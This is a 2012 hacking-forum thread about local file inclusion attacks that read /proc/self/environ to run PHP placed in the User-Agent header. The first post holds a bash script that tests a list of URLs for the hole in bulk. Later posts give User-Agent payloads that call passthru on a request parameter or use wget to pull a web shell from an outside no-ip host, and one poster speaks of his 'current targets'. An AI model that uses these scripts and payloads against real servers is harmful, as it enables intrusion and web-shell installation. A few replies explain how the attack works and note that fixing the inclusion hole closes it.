Author Topic: LFI exploit running in the wild (Read 384 times)

neusbeer · « **on:** January 27, 2012, 09:19:35 am »

There's a 'new' lfi attack being used a lot at this moment.
read this article http://www.devilscafe.in/2012/01/lfi-and-shell-upload-with-tamper-data.html
in's a lfi with standard /etc/passwd inclusion, and right after that a check
for /proc/self/eviron
I never heard of this 'link'.. what is it? I know it's from linux.. is it the
running account info on the server?
anyways it allows the use of a shell ;-)

I made a script to check the exploit on a url list.
input a list with /etc/passwd in the url (example list)
and results in a logfile with /proc/self/eviron possible.
(after that tampering user-agent to get your shell up there :-))

Code: [Select]

#!/bin/bash
cat "$1" | while read url ; do
 test=$(curl "$url" | grep -i "root")
 if [ -z "$test" ]; then 
   echo "No LFI in $url"
  else
   echo "LFI found in $url"
   echo "$url" >> output.log
  fi
done
cat output.log | sed 's/\/etc\/passwd/\/proc\/self\/environ/g' | while read url1 ; do
  test=$(curl "$url1" | grep -i "document_root")
  if [ -z "$test" ]; then 
    echo "No /proc/self/environ in $url1"
  else
   echo "/proc/self/environ found in $url1"
   echo "$url1" >> final_list.log
  fi
done

imation · « **Reply #1 on:** January 27, 2012, 10:04:03 am »

saw this the other day, very interesting!

Ive been using TamperData for years now, brilliant tool

neusbeer · « **Reply #2 on:** January 27, 2012, 11:00:07 am »

I don't.. I use mostly Fillder2 (gives me mostly the same results)..
Testing now that tamperdata script from firefox..
looks handy..

ca0s · « **Reply #3 on:** January 27, 2012, 12:02:14 pm »

/proc/self/environ contains environment variables for curren process.
In apache (idk if in another servers works too) it contains several fields of information, being one of them the User-agent of the client. If you can include /proc/self/environ and you set your user-agent to something like "<?php passthru($_GET['s']); ?>" that PHP code will be executed.

neusbeer · « **Reply #4 on:** January 27, 2012, 01:32:48 pm »

yes.. that's the idea!

only I'm struggling with the codes..

in that way as you describe I get an error about wrong char use in the T_STRING
the ' won't work... at least at my current targets..
so <?exec('wget http://xx.no-ip.org/Shells/SyRiAn_Sh3ll_V7.txt -O shell.php');?>
willl return and error that the ' isn't accepted.
when I try with passtru,
<? passthru($_GET['cmd']); ?> in the USER AGENT and add ?cmd=wget http://xx.no-ip.org/Shells/SyRiAn_Sh3Lll_V7.txt -O shell.php
I get an error that I'm not giving a url.
(think spaces in url?)

ande · « **Reply #5 on:** January 27, 2012, 03:07:55 pm »

Quote from: neusbeer on January 27, 2012, 01:32:48 pm

yes.. that's the idea!

only I'm struggling with the codes..

in that way as you describe I get an error about wrong char use in the T_STRING
the ' won't work... at least at my current targets..
so <?exec('wget http://xx.no-ip.org/Shells/SyRiAn_Sh3ll_V7.txt -O shell.php');?>
willl return and error that the ' isn't accepted.
when I try with passtru,
<? passthru($_GET['cmd']); ?> in the USER AGENT and add ?cmd=wget http://xx.no-ip.org/Shells/SyRiAn_Sh3Lll_V7.txt -O shell.php
I get an error that I'm not giving a url.
(think spaces in url?)

I always use <?php ?>, might be the problem. Dunno.

Anyway, on another note. This is old. Old. Old. Old. We have posts about this back from 2006-7. Just sayin.

FuyuKitsune · « **Reply #6 on:** January 27, 2012, 03:43:38 pm »

Aw man, where are the archives when you need them. Somebody posted a guide on something very similar to this (it was named something like LFI + log poisoning).

ca0s · « **Reply #7 on:** January 27, 2012, 04:49:45 pm »

Quote from: FuyuKitsune on January 27, 2012, 03:43:38 pm

Aw man, where are the archives when you need them. Somebody posted a guide on something very similar to this (it was named something like LFI + log poisoning).

It is the same concept. You "poison" the logs with an user-agent containing PHP code and then execute it with a LFI. But you need read rights to those logs.

neusbeer · « **Reply #8 on:** January 27, 2012, 08:54:18 pm »

log poisioning is something different..

hmm and I still can't get the damn thing to work

neusbeer · « **Reply #9 on:** February 10, 2012, 08:15:13 pm »

Quote from: ande on January 27, 2012, 03:07:55 pm

I always use <?php ?>, might be the problem. Dunno.

Anyway, on another note. This is old. Old. Old. Old. We have posts about this back from 2006-7. Just sayin.

(sorry double post, but just saw this post)

maybe old.. but I just found out..

and why isn't it fixed by now ?

I often check spiderlabs blog for new (or in this case old) exploits/hack tries on their honeypots and servers etc.. and some other contributers on this.
often gives me a lot of new info what is being exploited at this moment, and
even the requests etc.

ow and php quote has to end with ?> .. always?

ande · « **Reply #10 on:** February 10, 2012, 09:20:13 pm »

Quote from: neusbeer on February 10, 2012, 08:15:13 pm

(sorry double post, but just saw this post)

maybe old.. but I just found out..
and why isn't it fixed by now ?

I often check spiderlabs blog for new (or in this case old) exploits/hack tries on their honeypots and servers etc.. and some other contributers on this.
often gives me a lot of new info what is being exploited at this moment, and
even the requests etc.

The /proc/self/environ is not an exploit or bug in itself. It is still just a LFI problem. Therefore it is not fixed. Fix the LFI vuln and you fix the /proc/self/environ problem.

Quote from: neusbeer on February 10, 2012, 08:15:13 pm